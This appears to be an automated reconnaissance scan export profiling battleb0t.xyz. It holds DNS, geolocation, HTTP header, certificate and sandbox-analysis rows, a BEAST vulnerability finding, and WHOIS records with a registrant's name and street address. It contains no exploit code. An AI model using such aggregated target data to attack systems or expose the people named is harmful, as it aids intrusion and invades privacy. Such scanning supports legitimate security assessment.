| 2023-05-12 03:18:52 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=134 @ 90, 'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 78, 'Image XResolution': (0x011A) Ratio=72 @ 98, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 168, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 216, 'Image DateTime': (0x0132) ASCII=2023:01:11 18:24:47 @ 114, 'Image YResolution': (0x011B) Ratio=72 @ 106, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 180, 'EXIF ExifImageLength': (0xA003) Long=2316 @ 204, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 144, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 54, 'EXIF ExifImageWidth': (0xA002) Long=3088 @ 192, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 156} | https://funny.battleb0t.xyz/images/carti_1.jpg |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:10 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3031::6815:6a6 |
| 2023-05-12 02:46:00 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:59'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'172.67.168.252', u'continent': u'North America', u'region_iso_code': u'IL'} | 172.67.168.252 |
| 2023-05-12 02:58:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/docs', u'type': u'submitted', u'verdict': u'malicious'}, {u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/favicon.ico', u'type': u'visited', u'verdict': u'suspicious'}, {u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/docs', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"psti-dot-wearatar-dev.uc.r.appspot.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"psti-dot-wearatar-dev.uc.r.appspot.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF0CC.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF0CD.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fe8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fe8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fe8_ConnHashTable<4072>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fe8_IESQMMUTEX_0_331"\n "IsoScope_fe8_IE_EarlyTabStart_0x670_Mutex"\n "IsoScope_fe8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4072"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.250.191.84:80"\n "104.16.86.20:443"\n "34.74.170.74:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "WY7JZ84F.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WY7JZ84F.txt]- [targetUID: 00000000-00004072]\n Dropped file: "A6NT0WYE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A6NT0WYE.txt]- [targetUID: 00000000-00004072]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabE754.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "CabED9F.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002920]\n "_60BC7826-49A7-11ED-ADE6-080027C778EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "9FF67FB3141440EED32363089565AE60_33E6263BAF1D93C3B754E2140B85CB43" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_33E6263BAF1D93C3B754E2140B85CB43]- [targetUID: 00000000-00002920]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004072]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002920]\n "RecoveryStore._29018067-49A7-11ED-ADE6-080027C778EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "WY7JZ84F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WY7JZ84F.txt]- [targetUID: 00000000-00004072]\n "_29018069-49A7-11ED-ADE6-080027C778EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "swagger-ui-bundle_1_.js" has type "data"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00004072]\n "TarF0CC.tmp" has type "data"- Location: [%TEMP%\\TarF0CC.tmp]- [targetUID: 00000000-00002920]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00004072]\n "DDB0B468D23C74904993FA6E9CDC1988" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\DDB0B468D23C74904993FA6E9CDC1988]- [targetUID: 00000000-00002920]\n "~DF51DF99C6ABB698A3.TMP" has type "data"- Location: [%TEMP%\\~DF51DF99C6ABB698A3.TMP]- [targetUID: 00000000-00004072]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://psti-dot-wearatar-dev.uc.r.appspot.com/docs"\n Pattern match: "http://psti-dot-wearatar-dev.uc.r.appspot.com"\n Heuristic match: "psti-dot-wearatar-dev.uc.r.appspot.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'6345f449ab81ca2c01100ca1', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'142.250.191.84', u'104.16.86.20', u'34.74.170.74'], u'sha256': u'2a7999a7c7b888cb2de97ef77fd40b70d500bd4d0d867d53de57717906f536f9', u'sha512': u'9744da3e0ec5e27a8fbb50ae556122a5ad52cdcc373e630cd97ce77c0d58f82c30bb0fa88d846f8ccc580a46c53a0782d655599601f985d90f468df503e676f2', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/docs', u'submission_id': u'6345f449ab81ca2c01100ca2', u'created_at': u'2022-10-11T22:55:05+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-11T22:55:06+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 3, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section | 34.74.170.74 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ajansbegum (Net ID: 00:02:CF:87:A5:A4) | 40.2024, 29.0398 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.109.153 | www.battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_5.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:34:00 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
sgssso
<Qwm7
>6x.O
x>t7?
g$sy?
.b97<
/Ggy!
l/5-o
ggs43Z
x.o.n>
NNEsz
gmuss
Mswy5
dIys6
>t6w6
03Ryr\G
a>0xM
g_on8
9!6sBsmms
?r:\t
L5M3O
nq_JxO
`uns?g
F1_?J
$vw3C
?.O:H
Gq$rMmo
0y7?i
<?qgg
WYeyq$
!um_KM
ykmsrzz
?2Cm7
3>O0?
irIyo
t.Iof?y
R\y2I
tnt"3
!t5K?/
hfIoq'
bI>sy
w?f?f?
<Aq"Cio
/uMbO
> Ige
>km7M
1$vw0
y.n/"
/uM>9
njKym
v:Ky$
ryw2Com
s<U?o
v?R.>
hGydd
soyg'
:7Ieq
5zO-$
2pMsw
wGo$w?<w
:xssms
jVw:o
.?ygs
nn9?m
oO_n:
nFumS
W7ofc
U95 5
Gs\-?o
ry>f<
gae$w
?2kmO
sIyf/!
t8y<?
\Cwy1
_Bx_K
oeqq$
g5b9c
/2?.o/
hcg>o
kkkn?
/`0E'
xn/<a
uwosm
.<7qq
zdWqk
$1\Mm
rzW?'
tx<Iogss
ldU9?
K?.?/
r\isI
?6gAs
$Kxn<
nnnOS
qyooo
Hc<M?
Ej\Ioy'
x'8_a | https://funny.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0067ed.github.io | 185.199.111.153 |
| 2023-05-12 03:14:48 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | www.ayhu.xyz |
| 2023-05-12 02:54:34 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.64.0/20 | 104.21.71.14 |
| 2023-05-12 03:31:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | jrupp@name.com | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in the Name.com, Inc. WHOIS database is provided by Name.com, Inc. for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Name.com, Inc. does not guarantee its accuracy. Users accessing the Name.com, Inc. WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Name.com, Inc., except as reasonably necessary to register domain names or modify existing registrations. When using the Name.com, Inc. WHOIS service, please consider the following: the WHOIS service is not a replacement for standard EPP commands to the SRS service. WHOIS is not considered authoritative for registered domain objects. The WHOIS service may be scheduled for downtime during production or OT&E maintenance periods. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis, for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.name.com/layered-access-request . Name.com, Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | memrise (Category: hobby)
https://app.memrise.com/user/login/ | login |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f6059be52c402-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 02:45:43 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco', u'security': {u'is_vpn': False}, u'city_geoname_id': 5391959, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -122.3993, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:42'}, u'latitude': 37.7642, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.109.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.109.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Yapitest (Net ID: 00:14:7C:B0:26:1A) | 40.2024, 29.0398 |
| 2023-05-12 02:56:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:26:42:72:54:54:74:21:1e:c0:7a:66:54:5a:
e8:26:8a:a7:bb:78:e0:52:09:b4:70:cd:bc:21:4b:
2c:77:39:63:f4:67:8f:19:31:3e:f0:0f:58:55:9d:
80:0d:29:74:7f:66:1f:df:6c:0f:e4:7c:f2:b1:63:
d3:73:4b:d0:8e:1c:94:d5:39:9f:87:08:c9:39:28:
06:18:ff:8b:b4:c8:13:46:ac:cf:6d:a5:8c:43:a0:
09:d6:74:e4:1b:e6:a1:90:6d:22:b3:ba:58:9d:f7:
79:37:55:b1:58:ef:15:cb:64:d0:30:b0:3c:9c:57:
0f:fe:6c:6b:bb:3f:27:84:33:78:b0:19:92:bf:97:
a6:0f:20:d5:97:af:a6:3b:9d:2c:b6:18:1b:80:b6:
fb:2e:b9:e7:44:40:3a:ab:de:d1:27:94:5c:98:f3:
69:c6:eb:0a:ba:59:dd:58:0a:8d:f7:6b:71:2d:96:
80:0b:9a:05:20:72:48:c7:59:11:c0:d5:98:a3:64:
8a:78:35:12:8b:20:64:de:10:73:21:62:d5:82:94:
42:92:41:f0:40:98:0d:fd:64:08:ef:ba:99:48:1d:
ae:86:bd:de:46:1e:c7:72:49:3d:93:76:b8:e9:ff:
0d:e2:5c:31:61:a9:f2:59:1c:92:cb:56:9f:9b:f7:
48:28:35:ef:e1:4f:ae:4c:d6:6f:39:80:a0:50:ab:
78:66:96:ff:8d:78:93:50:2d:b7:0a:ef:fe:70:44:
cf:d9:e4:4f:5e:34:97:d6:93:af:d9:54:30:40:86:
24:9c:59:46:7c:df:86:e9:5e:eb:17:7f:95:e4:0e:
70:f5:5a:35:d4:64:cb:b9:5b:5c:bb:45:e6:4e:80:
a3:6d:83:42:86:a4:44:3b:83:c2:1d:e2:02:99:d0:
36:4c:c3:91:eb:69:38:a7:7d:2f:35:65:33:3e:23:
0b:5d:1b:0c:01:a1:10:75:e2:ac:bb:3b:bf:f6:2f:
ec:4e:98:ec:53:ee:86:34:4c:69:d1:38:5c:a9:07:
72:79:62:64:81:ea:03:fc:2f:18:db:04:b6:04:36:
1d:bc:01:56:0e:d9:49:1c:dd:41:11:ce:34:13:0f:
13:81:d8:cd:71:a3:fc:76:2b:ea:14:1c:8d:38:63:
54:f1:73:9f:26:18:47:68:79:40:b9:a0:ac:b7:d2:
e0:a8:36:94:6f:0c:c3:56:34:6a:ee:a7:97:c4:d3:
0b:44:a3:56:87:d8:dc:ce:f3:89:8c:09:62:1a:25:
1f:dd:5f:2a:c0:d4:a9:14:4f:34:09:bc:53:d5:35:
be:6b:0d:6a:49:bf:0b:11:66:23:11:60:25:c5:db:
56:15:5d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
